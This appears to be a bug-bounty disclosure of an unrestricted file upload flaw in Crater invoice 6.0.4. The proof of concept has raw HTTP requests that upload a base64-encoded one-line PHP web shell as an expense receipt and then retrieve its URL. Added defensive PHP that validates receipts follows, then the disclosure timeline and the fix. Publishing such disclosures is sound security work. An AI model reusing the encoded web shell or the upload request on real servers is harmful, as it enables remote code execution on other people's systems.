Unrestricted Upload of File with Dangerous Type in crater-invoice/crater

Valid

Reported on

Feb 20th 2022


Description

In the current Crater version (commit bed05fc2, tag 6.0.4), a privileged user can upload a PHP file as an expense receipt.

Proof of Concept

POST /api/v1/expenses/59/upload/receipts HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IkxRVSt6bm55Y0VyTkl6UUFaaWQ5cXc9PSIsInZhbHVlIjoiSkxPZi9tZHhiakxDeEYxR1ZmS0tXYmZrZnlqcHRVWnVQRUFQbzRpT1FBUzZzSUNYaU4vK0pLbG45Uk9SdHJBajR4bTVURzBvOHBpUjF4NmRWcFc0dlo0MUdsUHllVEZWaFRWU0lLZllWbkthbHJ5dTJLNEdkNG1mejlxZU9WUEYiLCJtYWMiOiIyODQ4NmY4MGQyZTg5NjhhM2EzM2JhNjA5ZDE4M2JjYjRhNDUyYjU2ZDZiNGZhMWI2ZmIzYTI1ZDQ0YjA2OWQ0IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------167024296112701364263127960184
Content-Length: 372
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/expenses/59/edit
Cookie: ...

-----------------------------167024296112701364263127960184
Content-Disposition: form-data; name="type"

edit
-----------------------------167024296112701364263127960184
Content-Disposition: form-data; name="attachment_receipt"

{"data":"PD89YCRfR0VUWzFdYD8+","type":"edit","name":"2137webshell.php"}
-----------------------------167024296112701364263127960184--



When the expense is then fetched through the API, the response contains an attachment_receipt_url parameter with the URL of the uploaded PHP file.

GET /api/v1/expenses/59 HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IkR4UDNSU1kzai9Ya0ljSTg1cEpCWmc9PSIsInZhbHVlIjoiMVA1b241VHpQWlBQNklrT1RVM1RxcUZRSEU3MGkraHh1OTNQcnJzdWVGR25mblZRQWp6Y3hhYzJnamkyWDgzNEpING9hb3lzT1U4dWlKYlFrcm0zYWlKNWNOQlRhWHVnQnpuTm1TZVVSdHIweTNHMFJJN0F4Z3FwNlhYZEVaY1oiLCJtYWMiOiI3YTQyMDk1NGNmYTYxMGMyZWM0MzQzNDkwMWQ0NDc1NzdiNjdiNmRhNzgzNTA4ZjU5NDVhYTAyNWU1YzZiNDYzIiwidGFnIjoiIn0=
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/expenses/59/edit
Cookie: ...


HTTP/1.1 200 OK
Host: 172.17.0.1:8888
Date: Sun, 20 Feb 2022 20:47:20 GMT
Connection: close
X-Powered-By: PHP/8.0.15
Cache-Control: no-cache, private
Date: Sun, 20 Feb 2022 20:47:20 GMT
Content-Type: application/json
X-RateLimit-Limit: 180
X-RateLimit-Remaining: 178
Set-Cookie: ...

{
    "data":
    {
        "id": 59,
        "expense_date": "2022-01-22T00:00:00.000000Z",
        "amount": 100,
        "notes": "assss",
        "customer_id": 2,
        "attachment_receipt_url":
        {
            "url": "http:\/\/172.17.0.1:8888\/storage\/50\/2137webshell.php",
            "type": "other"
        }
...
    }
}

Impact

This vulnerability is of high severity and leads to code execution.
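The page links the fix (PR #855) but does not show it. As an added example that is not Crater's own code, the PHP below validates the JSON payload shape the PoC sends in the attachment_receipt field (an extension allow-list plus content sniffing, with a server-generated filename); the function and constant names are assumptions.

```php
<?php
// Added example, not Crater's own code: validates the JSON carried by the
// "attachment_receipt" form field ({"data","type","name"}) before anything
// is written under storage/. All names here are assumptions.
// allowed extension => MIME type that content sniffing must report
const ALLOWED_RECEIPT_TYPES = [
    'pdf' => 'application/pdf', 'png' => 'image/png',
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
];
// Returns [server-side filename, bytes] for an acceptable receipt, or throws.
// The client name only selects the extension; the stored name is generated
// here, so "2137webshell.php" is never used as a path on disk.
function validateReceiptUpload(string $json): array
{
    $payload = json_decode($json, true, 8, JSON_THROW_ON_ERROR);
    if (!is_array($payload) || !isset($payload['data'], $payload['name'])) {
        throw new InvalidArgumentException('payload must contain data and name');
    }
    // Allow-list on the final extension; everything else (php, phtml, ...) is refused.
    $ext = strtolower(pathinfo(basename((string) $payload['name']), PATHINFO_EXTENSION));
    if (!isset(ALLOWED_RECEIPT_TYPES[$ext])) {
        throw new InvalidArgumentException("extension '.$ext' is not an allowed receipt type");
    }
    // Strict base64 decoding rejects malformed input instead of guessing.
    $bytes = base64_decode((string) $payload['data'], true);
    if ($bytes === false || $bytes === '') {
        throw new InvalidArgumentException('data is not valid base64');
    }
    // Sniff the bytes themselves; the name the client chose proves nothing.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($mime !== ALLOWED_RECEIPT_TYPES[$ext]) {
        throw new InvalidArgumentException("content sniffed as $mime, expected " . ALLOWED_RECEIPT_TYPES[$ext]);
    }
    return [bin2hex(random_bytes(16)) . '.' . $ext, $bytes];
}
// Constructed inputs: a PNG signature under a .png name passes; a text blob
// under a .php name is refused before its content is even inspected.
$cases = [
    '{"data":"iVBORw0KGgo=","type":"edit","name":"receipt.png"}',
    '{"data":"aGVsbG8=","type":"edit","name":"2137webshell.php"}',
];
foreach ($cases as $case) {
    try {
        [$stored] = validateReceiptUpload($case);
        echo "accepted, stored as $stored\n";
    } catch (Throwable $e) {
        echo 'rejected: ' . $e->getMessage() . "\n";
    }
}
```

Serving the storage directory with script execution disabled is still needed as a second layer, since an allow-list can only cover the types the application knows about.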

We are processing your report and will contact the crater-invoice/crater team within 24 hours. a year ago
We have contacted a member of the crater-invoice/crater team and are waiting to hear back a year ago
We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. a year ago
We have sent a second follow up to the crater-invoice/crater team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the crater-invoice/crater team. This report is now considered stale. a year ago
Mohit Panjwani validated this vulnerability a year ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
theworstcomrade
a year ago

Researcher


@mohitpanjwani here you have the fix https://github.com/crater-invoice/crater/pull/855

Mohit Panjwani marked this as fixed in 6.0.6 with commit 88035e a year ago
theworstcomrade has been awarded the fix bounty
This vulnerability will not receive a CVE